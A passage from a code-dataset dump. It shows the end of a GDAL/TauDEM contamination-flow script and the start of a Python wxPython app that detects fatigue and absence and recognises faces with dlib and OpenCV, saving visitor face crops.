Float32 -of GTiff '{6}' '{7}'\".format(pixelSizeX, pixelSizeY, minx, miny, maxx, maxy, Basin, BASINdm) \n subprocess.call(cmd3, shell=True)\n #Execute contamination flow command\n cmd4 = \"mpiexec /usr/local/taudem/dinfconclimaccum -ang '{0}' -dg '{1}' -dm '{2}' -ctpt '{3}' -q '{4}' -csol 1 -o '{5}' -nc\".format(BASINang, BASINdg, BASINdm, BASINctpt, BASINdm, Outlets)\n subprocess.call(cmd4, shell=True)\n \n #Output Contamination Areas\n cmd5=\"gdal_translate -a_nodata -9999 -of GTiff '{0}' '{1}'\".format(BASINctpt, R1)\n subprocess.call(cmd5, shell=True)\n cmd6=\"gdalwarp -of GTiff -cutline '{0}' -crop_to_cutline '{1}' '{2}'\".format(Basin, R1, R2)\n subprocess.call(cmd6, shell=True)\n cmd7=\"gdal_translate -a_nodata -9999 -of GTiff '{0}' '{1}'\".format(R2, R3)\n subprocess.call(cmd7, shell=True)\n cmd8=\"gdal_calc.py --calc 'A*logical_not(A<0)' --format GTiff --type Float32 -A '{0}' --A_band 1 --outfile '{1}'\".format(R3, ContamArea)\n subprocess.call(cmd8, shell=True)\n cmd9=\"gdal_polygonize.py '{0}' -8 -b 1 -f 'ESRI Shapefile' '{1}'\".format(ContamArea, ContamShp)\n subprocess.call(cmd9, shell=True)\n \n shapefile = ogr.Open(ContamShp, 1)\n \n layer = shapefile.GetLayer()\n layer.SetAttributeFilter(\"DN = 0\")\n \n for feat in layer:\n print (feat.GetField(\"DN\"))\n layer.DeleteFeature(feat.GetFID())\n\n\nif __name__ == '__main__':\n\n ContaminationFlow()\n","repo_name":"jrc15/geomFlaskApp","sub_path":"FlaskApp/HydroContamination.py","file_name":"HydroContamination.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19438509610","text":"# -*- coding: utf-8 -*-\r\nimport shutil\r\nimport dlib # 人脸识别的库dlib\r\nimport numpy as np # 数据处理的库numpy\r\nimport wx # 构造显示界面的GUI\r\nimport wx.xrc\r\nimport wx.adv\r\n# import the necessary packages\r\nfrom scipy.spatial import distance as dist\r\nfrom imutils.video import FileVideoStream\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nimport argparse\r\nimport imutils\r\nimport datetime, time\r\nimport math\r\nimport os\r\nimport pandas as pd\r\nimport winsound # 系统音效\r\nfrom playsound import playsound # 音频播放\r\nimport csv # 存入表格\r\nimport time\r\nimport sys\r\nimport numpy as np # 数据处理的库 numpy\r\nfrom cv2 import cv2 as cv2 # 图像处理的库 OpenCv\r\nimport pandas as pd # 数据处理的库 Pandas\r\nfrom skimage import io\r\nimport socket\r\nimport codecs\r\n## Class Fatigue_detecting\r\n###########################################################################\r\n\r\nCOVER = 'G:/pycharm project/python project/face detecting/images/camera.png'\r\n\r\n\r\nfacerec = dlib.face_recognition_model_v1(\r\n \"G:/pycharm project/python project/face detecting/model/dlib_face_recognition_resnet_model_v1.dat\")\r\n# 用来存放所有录入人脸特征的数组\r\n# the array to save the features of faces in the database\r\nfeatures_known_arr = []\r\n\r\ndetector = dlib.get_frontal_face_detector()\r\n\r\nface_rec = dlib.face_recognition_model_v1(\"G:/pycharm project/python project/face detecting/model/dlib_face_recognition_resnet_model_v1.dat\")\r\n\r\npredictor = dlib.shape_predictor(\"G:/pycharm project/python project/face detecting/model/shape_predictor_68_face_landmarks.dat\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n# \"\"\"\r\n# client\r\n# connect()\r\n# recv()\r\n# send()\r\n# sendall()\r\n# \"\"\"\r\n# # 创建套接字,绑定套接字到本地IP与端口\r\n# sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n# # address = ('10.1.156.82', 8001)\r\n# sk.connect(('10.1.156.82', 8001))\r\n# inp = '030300000002c5e9'\r\n# while True:\r\n# if inp == 'exit':\r\n# print(\"exit\")\r\n# break\r\n# # 默认编码为十六进制编码\r\n# sk.send(codecs.decode(inp, 'hex'))\r\n# # 每2秒读取以此数据\r\n# time.sleep(2)\r\n# # 每次接受1024字节的数据\r\n# result = sk.recv(1024)\r\n# result = codecs.encode(result, 'hex')\r\n# r = bytes(result).decode('utf-8')\r\n# shidu = int(r[6:10], 16) / 100\r\n# wendu = int(r[10:14], 16) / 100\r\n# print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\r\n# print(\"温度:%s,湿度:%s\\n\" % (wendu, shidu))\r\nsk.close()\r\ndef return_128d_features(path_img):\r\n im_rd = io.imread(path_img)\r\n img_gray = cv2.cvtColor(im_rd, cv2.COLOR_BGR2RGB)\r\n faces = detector(img_gray, 1)\r\n\r\n print(\"%-40s %-20s\" % (\"检测到人脸的图像 / image with faces detected:\", path_img), '\\n')\r\n\r\n # 因为有可能截下来的人脸再去检测,检测不出来人脸了\r\n # 所以要确保是 检测到人脸的人脸图像 拿去算特征\r\n if len(faces) != 0:\r\n shape = predictor(img_gray, faces[0])\r\n face_descriptor = face_rec.compute_face_descriptor(img_gray, shape)\r\n else:\r\n face_descriptor = 0\r\n print(\"no face\")\r\n\r\n return face_descriptor\r\n\r\ndef return_features_mean_personX(path_faces_personX):\r\n features_list_personX = []\r\n photos_list = os.listdir(path_faces_personX)\r\n if photos_list:\r\n for i in range(len(photos_list)):\r\n # 调用return_128d_features()得到128d特征\r\n print(\"%-40s %-20s\" % (\"正在读的人脸图像 / image to read:\", path_faces_personX + \"/\" + photos_list[i]))\r\n features_128d = return_128d_features(path_faces_personX + \"/\" + photos_list[i])\r\n # print(features_128d)\r\n # 遇到没有检测出人脸的图片跳过\r\n if features_128d == 0:\r\n i += 1\r\n else:\r\n features_list_personX.append(features_128d)\r\n else:\r\n print(\"文件夹内图像文件为空 / Warning: No images in \" + path_faces_personX + '/', '\\n')\r\n\r\n # 计算 128D 特征的均值\r\n # N x 128D -> 1 x 128D\r\n if features_list_personX:\r\n features_mean_personX = np.array(features_list_personX).mean(axis=0)\r\n else:\r\n features_mean_personX = '0'\r\n\r\n return features_mean_personX\r\npath_images_from_camera = \"G:/pycharm project/python project/face detecting/pictures/people/\"\r\nclass Fatigue_detecting(wx.Frame):\r\n\r\n def __init__(self, parent, title):\r\n wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition, size=wx.Size(873, 535),\r\n style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)\r\n # wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition, size=wx.Size(900, 700),style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENU))\r\n\r\n bSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n bSizer2 = wx.BoxSizer(wx.HORIZONTAL)\r\n bSizer3 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.m_animCtrl1 = wx.adv.AnimationCtrl(self, wx.ID_ANY, wx.adv.NullAnimation, wx.DefaultPosition,\r\n wx.DefaultSize, wx.adv.AC_DEFAULT_STYLE)\r\n bSizer3.Add(self.m_animCtrl1, 1, wx.ALL | wx.EXPAND, 5)\r\n bSizer2.Add(bSizer3, 9, wx.EXPAND, 5)\r\n bSizer4 = wx.BoxSizer(wx.VERTICAL)\r\n sbSizer1 = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, u\"parameters setting\"), wx.VERTICAL)\r\n sbSizer2 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"video source\"), wx.VERTICAL)\r\n gSizer1 = wx.GridSizer(0, 2, 0, 8)\r\n m_choice1Choices = [u\"camera_0\", u\"camera_1\", u\"camera_2\"]\r\n self.m_choice1 = wx.Choice(sbSizer2.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.Size(90, 25),\r\n m_choice1Choices, 0)\r\n self.m_choice1.SetSelection(0)\r\n gSizer1.Add(self.m_choice1, 0, wx.ALL, 5)\r\n self.camera_button1 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"start detecting\", wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.camera_button1, 0, wx.ALL, 5)\r\n self.vedio_button2 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"open video file\", wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.vedio_button2, 0, wx.ALL, 5)\r\n\r\n self.off_button3 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"pause\", wx.DefaultPosition, wx.Size(90, 25), 0)\r\n gSizer1.Add(self.off_button3, 0, wx.ALL, 5)\r\n sbSizer2.Add(gSizer1, 1, wx.EXPAND, 5)\r\n sbSizer1.Add(sbSizer2, 2, wx.EXPAND, 5)\r\n\r\n self.information_button1 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"upload \",\r\n wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.information_button1, 0, wx.ALL, 5)\r\n\r\n self.information_button2 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"update \",\r\n wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.information_button2, 0, wx.ALL, 5)\r\n\r\n sbSizer3 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"fatigue detecting\"), wx.VERTICAL)\r\n bSizer5 = wx.BoxSizer(wx.HORIZONTAL)\r\n self.yawn_checkBox1 = wx.CheckBox(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"yawning detecting\", wx.Point(-1, -1),\r\n wx.Size(-1, 15), 0)\r\n self.yawn_checkBox1.SetValue(True)\r\n bSizer5.Add(self.yawn_checkBox1, 0, wx.ALL, 5)\r\n self.blink_checkBox2 = wx.CheckBox(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"blinking detecting\", wx.Point(-1, -1),\r\n wx.Size(-1, 15), 0)\r\n self.blink_checkBox2.SetValue(True)\r\n bSizer5.Add(self.blink_checkBox2, 0, wx.ALL, 5)\r\n sbSizer3.Add(bSizer5, 1, wx.EXPAND, 5)\r\n bSizer6 = wx.BoxSizer(wx.HORIZONTAL)\r\n self.nod_checkBox7 = wx.CheckBox(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"nodding detecting\", wx.Point(-1, -1), wx.Size(-1, 15),\r\n 0)\r\n self.nod_checkBox7.SetValue(True)\r\n bSizer6.Add(self.nod_checkBox7, 0, wx.ALL, 5)\r\n self.m_staticText1 = wx.StaticText(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"testing interval(s):\", wx.DefaultPosition,\r\n wx.Size(-1, 15), 0)\r\n self.m_staticText1.Wrap(-1)\r\n bSizer6.Add(self.m_staticText1, 0, wx.ALL, 5)\r\n m_listBox2Choices = [u\"3\", u\"4\", u\"5\", u\"6\", u\"7\", u\"8\"]\r\n self.m_listBox2 = wx.ListBox(sbSizer3.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.Size(50, 24),\r\n m_listBox2Choices, 0)\r\n bSizer6.Add(self.m_listBox2, 0, 0, 5)\r\n sbSizer3.Add(bSizer6, 1, wx.EXPAND, 5)\r\n sbSizer1.Add(sbSizer3, 2, 0, 5)\r\n sbSizer4 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"absences detecting\"), wx.VERTICAL)\r\n bSizer8 = wx.BoxSizer(wx.HORIZONTAL)\r\n self.m_checkBox4 = wx.CheckBox(sbSizer4.GetStaticBox(), wx.ID_ANY, u\"absences detecting\", wx.DefaultPosition, wx.Size(-1, 15),\r\n 0)\r\n self.m_checkBox4.SetValue(True)\r\n bSizer8.Add(self.m_checkBox4, 0, wx.ALL, 5)\r\n self.m_staticText2 = wx.StaticText(sbSizer4.GetStaticBox(), wx.ID_ANY, u\"absences interval(s):\", wx.DefaultPosition,\r\n wx.Size(-1, 15), 0)\r\n self.m_staticText2.Wrap(-1)\r\n bSizer8.Add(self.m_staticText2, 0, wx.ALL, 5)\r\n m_listBox21Choices = [u\"5\", u\"10\", u\"15\", u\"20\", u\"25\", u\"30\"]\r\n self.m_listBox21 = wx.ListBox(sbSizer4.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.Size(50, 24),\r\n m_listBox21Choices, 0)\r\n bSizer8.Add(self.m_listBox21, 0, 0, 5)\r\n sbSizer4.Add(bSizer8, 1, 0, 5)\r\n sbSizer1.Add(sbSizer4, 1, 0, 5)\r\n #sbSizer5 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"analysis area\"), wx.VERTICAL)\r\n bSizer9 = wx.BoxSizer(wx.HORIZONTAL)\r\n #self.m_staticText3 = wx.StaticText(sbSizer5.GetStaticBox(), wx.ID_ANY, u\"analysis area: \", wx.DefaultPosition,\r\n #wx.DefaultSize, 0)\r\n #self.m_staticText3.Wrap(-1)\r\n #bSizer9.Add(self.m_staticText3, 0, wx.ALL, 5)\r\n #m_choice2Choices = [u\"full screen\", u\"part of screen\"]\r\n #self.m_choice2 = wx.Choice(sbSizer5.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\r\n #m_choice2Choices, 0)\r\n #self.m_choice2.SetSelection(0)\r\n #bSizer9.Add(self.m_choice2, 0, wx.ALL, 5)\r\n #sbSizer5.Add(bSizer9, 1, wx.EXPAND, 5)\r\n #sbSizer1.Add(sbSizer5, 1, 0, 5)\r\n sbSizer6 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"status output\"), wx.VERTICAL)\r\n self.m_textCtrl3 = wx.TextCtrl(sbSizer6.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition,\r\n wx.DefaultSize, wx.TE_MULTILINE | wx.TE_READONLY)\r\n sbSizer6.Add(self.m_textCtrl3, 1, wx.ALL | wx.EXPAND, 5)\r\n sbSizer1.Add(sbSizer6, 5, wx.EXPAND, 5)\r\n bSizer4.Add(sbSizer1, 1, wx.EXPAND, 5)\r\n bSizer2.Add(bSizer4, 3, wx.EXPAND, 5)\r\n bSizer1.Add(bSizer2, 1, wx.EXPAND, 5)\r\n\r\n self.SetSizer(bSizer1)\r\n self.Layout()\r\n self.Centre(wx.BOTH)\r\n\r\n # Connect Events\r\n self.m_choice1.Bind(wx.EVT_CHOICE, self.cameraid_choice) # 绑定事件\r\n self.camera_button1.Bind(wx.EVT_BUTTON, self.camera_on) # 开\r\n self.vedio_button2.Bind(wx.EVT_BUTTON, self.vedio_on)\r\n self.off_button3.Bind(wx.EVT_BUTTON, self.off) # 关\r\n self.information_button1.Bind(wx.EVT_BUTTON, self.upload)\r\n self.information_button2.Bind(wx.EVT_BUTTON, self.update)\r\n\r\n self.m_listBox2.Bind(wx.EVT_LISTBOX, self.AR_CONSEC_FRAMES) # 闪烁阈值设置\r\n self.m_listBox21.Bind(wx.EVT_LISTBOX, self.OUT_AR_CONSEC_FRAMES) # 脱岗时间设置\r\n\r\n # 封面图片\r\n self.image_cover = wx.Image(COVER, wx.BITMAP_TYPE_ANY)\r\n # 显示图片在m_animCtrl1上\r\n self.bmp = wx.StaticBitmap(self.m_animCtrl1, -1, wx.Bitmap(self.image_cover))\r\n\r\n # 设置窗口标题的图标\r\n self.icon = wx.Icon('./images/123.ico', wx.BITMAP_TYPE_ICO)\r\n self.SetIcon(self.icon)\r\n # 系统事件\r\n self.Bind(wx.EVT_CLOSE, self.OnClose)\r\n print(\"wxpython interface initialization is complete!\")\r\n \"\"\"参数\"\"\"\r\n # 默认为摄像头0\r\n self.VIDEO_STREAM = 0\r\n self.CAMERA_STYLE = False # False未打开摄像头,True摄像头已打开\r\n # 闪烁阈值(秒)\r\n self.AR_CONSEC_FRAMES_check = 3\r\n self.OUT_AR_CONSEC_FRAMES_check = 5\r\n # 眼睛长宽比\r\n self.EYE_AR_THRESH = 0.2\r\n self.EYE_AR_CONSEC_FRAMES = self.AR_CONSEC_FRAMES_check\r\n # 打哈欠长宽比\r\n self.MAR_THRESH = 0.5\r\n self.MOUTH_AR_CONSEC_FRAMES = self.AR_CONSEC_FRAMES_check\r\n # 瞌睡点头\r\n self.HAR_THRESH = 0.3\r\n self.NOD_AR_CONSEC_FRAMES = self.AR_CONSEC_FRAMES_check\r\n\r\n \"\"\"计数\"\"\"\r\n # 初始化帧计数器和眨眼总数\r\n self.COUNTER = 0\r\n self.TOTAL = 0\r\n # 初始化帧计数器和打哈欠总数\r\n self.mCOUNTER = 0\r\n self.mTOTAL = 0\r\n # 初始化帧计数器和点头总数\r\n self.hCOUNTER = 0\r\n self.hTOTAL = 0\r\n # 离职时间长度\r\n self.oCOUNTER = 0\r\n\r\n \"\"\"姿态\"\"\"\r\n # 世界坐标系(UVW):填写3D参考点,该模型参考http://aifi.isr.uc.pt/Downloads/OpenGL/glAnthropometric3DModel.cpp\r\n self.object_pts = np.float32([[6.825897, 6.760612, 4.402142], # 33左眉左上角\r\n [1.330353, 7.122144, 6.903745], # 29左眉右角\r\n [-1.330353, 7.122144, 6.903745], # 34右眉左角\r\n [-6.825897, 6.760612, 4.402142], # 38右眉右上角\r\n [5.311432, 5.485328, 3.987654], # 13左眼左上角\r\n [1.789930, 5.393625, 4.413414], # 17左眼右上角\r\n [-1.789930, 5.393625, 4.413414], # 25右眼左上角\r\n [-5.311432, 5.485328, 3.987654], # 21右眼右上角\r\n [2.005628, 1.409845, 6.165652], # 55鼻子左上角\r\n [-2.005628, 1.409845, 6.165652], # 49鼻子右上角\r\n [2.774015, -2.080775, 5.048531], # 43嘴左上角\r\n [-2.774015, -2.080775, 5.048531], # 39嘴右上角\r\n [0.000000, -3.116408, 6.097667], # 45嘴中央下角\r\n [0.000000, -7.415691, 4.070434]]) # 6下巴角\r\n\r\n # 相机坐标系(XYZ):添加相机内参\r\n self.K = [6.5308391993466671e+002, 0.0, 3.1950000000000000e+002,\r\n 0.0, 6.5308391993466671e+002, 2.3950000000000000e+002,\r\n 0.0, 0.0, 1.0] # 等价于矩阵[fx, 0, cx; 0, fy, cy; 0, 0, 1]\r\n # 图像中心坐标系(uv):相机畸变参数[k1, k2, p1, p2, k3]\r\n self.D = [7.0834633684407095e-002, 6.9140193737175351e-002, 0.0, 0.0, -1.3073460323689292e+000]\r\n\r\n # 像素坐标系(xy):填写凸轮的本征和畸变系数\r\n self.cam_matrix = np.array(self.K).reshape(3, 3).astype(np.float32)\r\n self.dist_coeffs = np.array(self.D).reshape(5, 1).astype(np.float32)\r\n\r\n # 重新投影3D点的世界坐标轴以验证结果姿势\r\n self.reprojectsrc = np.float32([[10.0, 10.0, 10.0],\r\n [10.0, 10.0, -10.0],\r\n [10.0, -10.0, -10.0],\r\n [10.0, -10.0, 10.0],\r\n [-10.0, 10.0, 10.0],\r\n [-10.0, 10.0, -10.0],\r\n [-10.0, -10.0, -10.0],\r\n [-10.0, -10.0, 10.0]])\r\n # 绘制正方体12轴\r\n self.line_pairs = [[0, 1], [1, 2], [2, 3], [3, 0],\r\n [4, 5], [5, 6], [6, 7], [7, 4],\r\n [0, 4], [1, 5], [2, 6], [3, 7]]\r\n\r\n def __del__(self):\r\n pass\r\n\r\n def get_head_pose(self, shape): # 头部姿态估计\r\n # (像素坐标集合)填写2D参考点,注释遵循https://ibug.doc.ic.ac.uk/resources/300-W/\r\n # 17左眉左上角/21左眉右角/22右眉左上角/26右眉右上角/36左眼左上角/39左眼右上角/42右眼左上角/\r\n # 45右眼右上角/31鼻子左上角/35鼻子右上角/48左上角/54嘴右上角/57嘴中央下角/8下巴角\r\n image_pts = np.float32([shape[17], shape[21], shape[22], shape[26], shape[36],\r\n shape[39], shape[42], shape[45], shape[31], shape[35],\r\n shape[48], shape[54], shape[57], shape[8]])\r\n # solvePnP计算姿势——求解旋转和平移矩阵:\r\n # rotation_vec表示旋转矩阵,translation_vec表示平移矩阵,cam_matrix与K矩阵对应,dist_coeffs与D矩阵对应。\r\n _, rotation_vec, translation_vec = cv2.solvePnP(self.object_pts, image_pts, self.cam_matrix, self.dist_coeffs)\r\n # projectPoints重新投影误差:原2d点和重投影2d点的距离(输入3d点、相机内参、相机畸变、r、t,输出重投影2d点)\r\n reprojectdst, _ = cv2.projectPoints(self.reprojectsrc, rotation_vec, translation_vec, self.cam_matrix,\r\n self.dist_coeffs)\r\n reprojectdst = tuple(map(tuple, reprojectdst.reshape(8, 2))) # 以8行2列显示\r\n\r\n # 计算欧拉角calc euler angle\r\n # 参考https://docs.opencv.org/2.4/modules/calib3d/doc/camera_calibration_and_3d_reconstruction.html#decomposeprojectionmatrix\r\n rotation_mat, _ = cv2.Rodrigues(rotation_vec) # 罗德里格斯公式(将旋转矩阵转换为旋转向量)\r\n pose_mat = cv2.hconcat((rotation_mat, translation_vec)) # 水平拼接,vconcat垂直拼接\r\n # decomposeProjectionMatrix将投影矩阵分解为旋转矩阵和相机矩阵\r\n _, _, _, _, _, _, euler_angle = cv2.decomposeProjectionMatrix(pose_mat)\r\n\r\n pitch, yaw, roll = [math.radians(_) for _ in euler_angle]\r\n\r\n pitch = math.degrees(math.asin(math.sin(pitch)))\r\n roll = -math.degrees(math.asin(math.sin(roll)))\r\n yaw = math.degrees(math.asin(math.sin(yaw)))\r\n # print('pitch:{}, yaw:{}, roll:{}'.format(pitch, yaw, roll))\r\n\r\n return reprojectdst, euler_angle # 投影误差,欧拉角\r\n\r\n def eye_aspect_ratio(self, eye):\r\n # 垂直眼标志(X,Y)坐标\r\n A = dist.euclidean(eye[1], eye[5]) # 计算两个集合之间的欧式距离\r\n B = dist.euclidean(eye[2], eye[4])\r\n # 计算水平之间的欧几里得距离\r\n # 水平眼标志(X,Y)坐标\r\n C = dist.euclidean(eye[0], eye[3])\r\n # 眼睛长宽比的计算\r\n ear = (A + B) / (2.0 * C)\r\n # 返回眼睛的长宽比\r\n return ear\r\n\r\n def mouth_aspect_ratio(self, mouth): # 嘴部\r\n A = np.linalg.norm(mouth[2] - mouth[9]) # 51, 59\r\n B = np.linalg.norm(mouth[4] - mouth[7]) # 53, 57\r\n C = np.linalg.norm(mouth[0] - mouth[6]) # 49, 55\r\n mar = (A + B) / (2.0 * C)\r\n return mar\r\n\r\n # 处理存放所有人脸特征的 csv\r\n path_features_known_csv = \"G:/pycharm project/python project/face detecting/1111.csv\"\r\n csv_rd = pd.read_csv(path_features_known_csv, header=None)\r\n\r\n\r\n # 读取已知人脸数据\r\n # print known faces\r\n for i in range(csv_rd.shape[0]):\r\n features_someone_arr = []\r\n for j in range(0, len(csv_rd.iloc[i, :])):\r\n features_someone_arr.append(csv_rd.iloc[i, :][j])\r\n features_known_arr.append(features_someone_arr)\r\n print(\"Faces in Database:\", len(features_known_arr))\r\n\r\n def _learning_face(self, event):\r\n \"\"\"dlib的初始化调用\"\"\"\r\n # 使用人脸检测器get_frontal_face_detector\r\n self.detector = dlib.get_frontal_face_detector()\r\n # dlib的68点模型,使用作者训练好的特征预测器\r\n self.predictor = dlib.shape_predictor(\r\n \"G:/pycharm project/python project/face detecting/model/shape_predictor_68_face_landmarks.dat\")\r\n self.m_textCtrl3.AppendText(u\"Loading model successfully!!\\n\")\r\n # 分别获取左右眼面部标志的索引\r\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\r\n (mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\r\n\r\n # 建cv2摄像头对象,这里使用电脑自带摄像头,如果接了外部摄像头,则自动切换到外部摄像头\r\n self.cap = cv2.VideoCapture(self.VIDEO_STREAM)\r\n\r\n if self.cap.isOpened() == True: # 返回true/false 检查初始化是否成功\r\n self.CAMERA_STYLE = True\r\n self.m_textCtrl3.AppendText(u\"Open the camera successfully!!\\n\")\r\n time_start = time.time()\r\n else:\r\n self.m_textCtrl3.AppendText(u\"Fail to open the camera!!\\n\")\r\n # 显示封面图\r\n self.bmp.SetBitmap(wx.Bitmap(self.image_cover))\r\n # 成功打开视频,循环读取视频流\r\n while (self.cap.isOpened()):\r\n # cap.read()\r\n # 返回两个值:\r\n # 一个布尔值true/false,用来判断读取视频是否成功/是否到视频末尾\r\n # 图像对象,图像的三维矩阵\r\n flag, im_rd = self.cap.read()\r\n kk = cv2.waitKey(1)\r\n # 取灰度\r\n img_gray = cv2.cvtColor(im_rd, cv2.COLOR_RGB2GRAY)\r\n\r\n # 使用人脸检测器检测每一帧图像中的人脸。并返回人脸数faces\r\n faces = self.detector(img_gray, 0)\r\n\r\n # 待会要写的字体 font to write later\r\n font = cv2.FONT_HERSHEY_COMPLEX\r\n\r\n # 存储当前摄像头中捕获到的所有人脸的坐标/名字\r\n # the list to save the positions and names of current faces captured\r\n pos_namelist = []\r\n name_namelist = []\r\n\r\n # 计算两个128D向量间的欧式距离\r\n # compute the e-distance between two 128D features\r\n def return_euclidean_distance(feature_1, feature_2):\r\n feature_1 = np.array(feature_1)\r\n feature_2 = np.array(feature_2)\r\n dist = np.sqrt(np.sum(np.square(feature_1 - feature_2)))\r\n return dist\r\n # 如果检测到人脸\r\n if (len(faces) != 0):\r\n # enumerate方法同时返回数据对象的索引和数据,k为索引,d为faces中的对象\r\n features_cap_arr = []\r\n for k, d in enumerate(faces):\r\n # 用红色矩形框出人脸\r\n cv2.rectangle(im_rd, (d.left(), d.top()), (d.right(), d.bottom()), (0, 0, 255), 1)\r\n # 使用预测器得到68点数据的坐标\r\n shape = self.predictor(im_rd, d)\r\n features_cap_arr.append(facerec.compute_face_descriptor(im_rd, shape))\r\n # 圆圈显示每个特征点\r\n for i in range(68):\r\n cv2.circle(im_rd, (shape.part(i).x, shape.part(i).y), 2, (0, 255, 0), -1, 8)\r\n for k in range(len(faces)):\r\n print(\"##### camera person\", k + 1, \"#####\")\r\n # 让人名跟随在矩形框的下方\r\n # 确定人名的位置坐标\r\n # 先默认所有人不认识,是 unknown\r\n # set the default names of faces with \"unknown\"\r\n name_namelist.append(\"unknown\")\r\n\r\n # 每个捕获人脸的名字坐标 the positions of faces captured\r\n pos_namelist.append(\r\n tuple([faces[k].left(), int(faces[k].bottom() + (faces[k].bottom() - faces[k].top()) / 4)]))\r\n\r\n # 对于某张人脸,遍历所有存储的人脸特征\r\n # for every faces detected, compare the faces in the database\r\n e_distance_list = []\r\n for i in range(len(features_known_arr)):\r\n # 如果 person_X 数据不为空\r\n if str(features_known_arr[i][0]) != '0.0':\r\n print(\"with person\", str(i + 1), \"the e distance: \", end='')\r\n e_distance_tmp = return_euclidean_distance(features_cap_arr[k], features_known_arr[i])\r\n print(e_distance_tmp)\r\n e_distance_list.append(e_distance_tmp)\r\n else:\r\n # 空数据 person_X\r\n e_distance_list.append(999999999)\r\n # 找出最接近的一个人脸数据是第几个\r\n # Find the one with minimum e distance\r\n similar_person_num = e_distance_list.index(min(e_distance_list))\r\n print(\"Minimum e distance with person\", int(similar_person_num) + 1)\r\n\r\n # 计算人脸识别特征与数据集特征的欧氏距离\r\n # 距离小于0.4则标出为可识别人物\r\n if min(e_distance_list) < 0.4:\r\n # 这里可以修改摄像头中标出的人名\r\n # Here you can modify the names shown on the camera\r\n # 1、遍历文件夹目���\r\n folder_name = 'G:/pycharm project/python project/face detecting/pictures/people'\r\n # 最接近的人脸\r\n sum = similar_person_num + 1\r\n key_id = 1 # 从第一个人脸数据文件夹进行对比\r\n # 获取文件夹中的文件名:1wang、2zhou、3...\r\n file_names = os.listdir(folder_name)\r\n for name in file_names:\r\n # print(name+'->'+str(key_id))\r\n if sum == key_id:\r\n # winsound.Beep(300,500)# 响铃:300频率,500持续时间\r\n name_namelist[k] = name[1:] # 人名删去第一个数字(用于视频输出标识)\r\n key_id += 1\r\n # 播放欢迎光临音效\r\n # playsound('D:/myworkspace/JupyterNotebook/People/music/welcome.wav')\r\n # print(\"May be person \"+str(int(similar_person_num)+1))\r\n # -----------筛选出人脸并保存到visitor文件夹------------\r\n for i, d in enumerate(faces):\r\n x1 = d.top() if d.top() > 0 else 0\r\n y1 = d.bottom() if d.bottom() > 0 else 0\r\n x2 = d.left() if d.left() > 0 else 0\r\n y2 = d.right() if d.right() > 0 else 0\r\n face = im_rd[x1:y1, x2:y2]\r\n size = 64\r\n face = cv2.resize(face, (size, size))\r\n # 要存储visitor人脸图像文件的路径\r\n # path_visitors_save_dir = \"D:/myworkspace/JupyterNotebook/People/visitor/known\"\r\n path_visitors_save_dir = \"G:/pycharm project/python project/face detecting/pictures/people/visitors/known\"\r\n # 存储格式:2019-06-24-14-33-40wang.jpg\r\n now_time = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\r\n save_name = str(now_time) + str(name_namelist[k]) + '.jpg'\r\n # print(save_name)\r\n # 本次图片保存的完整url\r\n save_path = path_visitors_save_dir + '/' + save_name\r\n # 遍历visitor文件夹所有文件名\r\n visitor_names = os.listdir(path_visitors_save_dir)\r\n visitor_name = ''\r\n for name in visitor_names:\r\n # 名字切片到分钟数:2019-06-26-11-33-00wangyu.jpg\r\n visitor_name = (name[0:16] + '-00' + name[19:])\r\n # print(visitor_name)\r\n visitor_save = (save_name[0:16] + '-00' + save_name[19:])\r\n # print(visitor_save)\r\n # 一分钟之内重复的人名不保存\r\n if visitor_save != visitor_name:\r\n cv2.imwrite(save_path, face)\r\n print(\r\n '新存储:' + 